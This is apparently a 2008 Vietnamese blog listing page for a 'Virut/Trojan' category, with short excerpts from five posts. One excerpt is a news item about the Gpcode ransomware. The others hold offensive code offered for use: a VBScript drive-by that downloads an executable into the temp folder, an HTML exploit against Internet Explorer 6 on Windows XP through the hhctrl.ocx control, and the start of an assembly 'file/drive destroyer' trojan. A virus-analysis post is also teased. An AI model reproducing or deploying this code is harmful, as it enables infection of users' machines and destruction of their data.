Portfolio
Virut / Trojan / Keylog

Phân tích Virus OSA.exe

June 27, 2008Category : Virut/Trojan

Bài của DungCoi Nguyên tắc khi phân tích virus : 1. Không tìm cách xóa virus trong hệ thống. Có thể bạn ngạc nhiên về điều này, nhưng thực ra, cái chúng ta muốn thực hiện đó là dừng hoàn toàn virus làm việc, còn việc lưu trữ chúng hoàn toàn là không cần thiết…

Read more
01.

Xuất hiện virus mã hóa dữ liệu của người dùng tại Việt Nam

June 25, 2008Category : Virut/Trojan

Hãng bảo mật Kaspersky cuối tuần qua đã phải lên tiếng kêu gọi sự giúp đỡ của cộng đồng để bẻ khóa cơ chế mã hóa 1024-bit RSA được tin tặc ứng dụng trong phiên bản mới Trojan Gpcode. Một khi con Trojan này đột nhập thành công vào PC nó sẽ ngay lập tức..

Read more
02.

script auto download

June 10, 2008Category : Virut/Trojan

<script language=”VBScript”> on error resume next dl = “link.exe” Set df = document.createElement(“object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,””) a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,””) S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(“Scripting.FileSystemObject”,””) set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder fname1= F.BuildPath(tmp,fname1)..

Read more
03.

code Trojan

June 10, 2008Category : Virut/Trojan

– Microsoft Internet Explorer 6.0 – Microsoft Windows XP Pro SP2 – Microsoft Windows XP Home SP2 Tạo trang web nội dung bất kỳ (ví dụ hack.htm ) có đính kèm đoạn mã sau đây : <OBJECT id=”localpage” type=”application/x-oleobject” classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ height=7% style=”position:absolute;top:140;left:72;z-index:100;” codebase=”hhctrl.ocx#Version=5,2,3790,1194″ width=”7%”> <PARAM name=”Command” value=”Related Topics, MENU”> <PARAM name=”Button” value=”Text:Just a button”> <PARAM..

Read more
04.

The Penis Trojan(Assembly)

June 10, 2008Category : Virut/Trojan

Laughing Dog MASM/TASM compatible Assembly-Code file/drive destroyer Created: 9/5/92, assemble and link to .EXE Đã edit lại vài chỗ PENIS_LENGTH EQU 2000 ; ha ha ha ha, a little funny for ya .MODEL small .STACK 100h ;256 byte stack .DATA PENIS_SCREEN LABEL WORD DW 0720H, 0720H, 0720H, 0720H, 0720H, 0720H, 0720H, 0720H DW 0720H, 0720H,..

Read more
05.
© Oliver / All rights reserved.
To top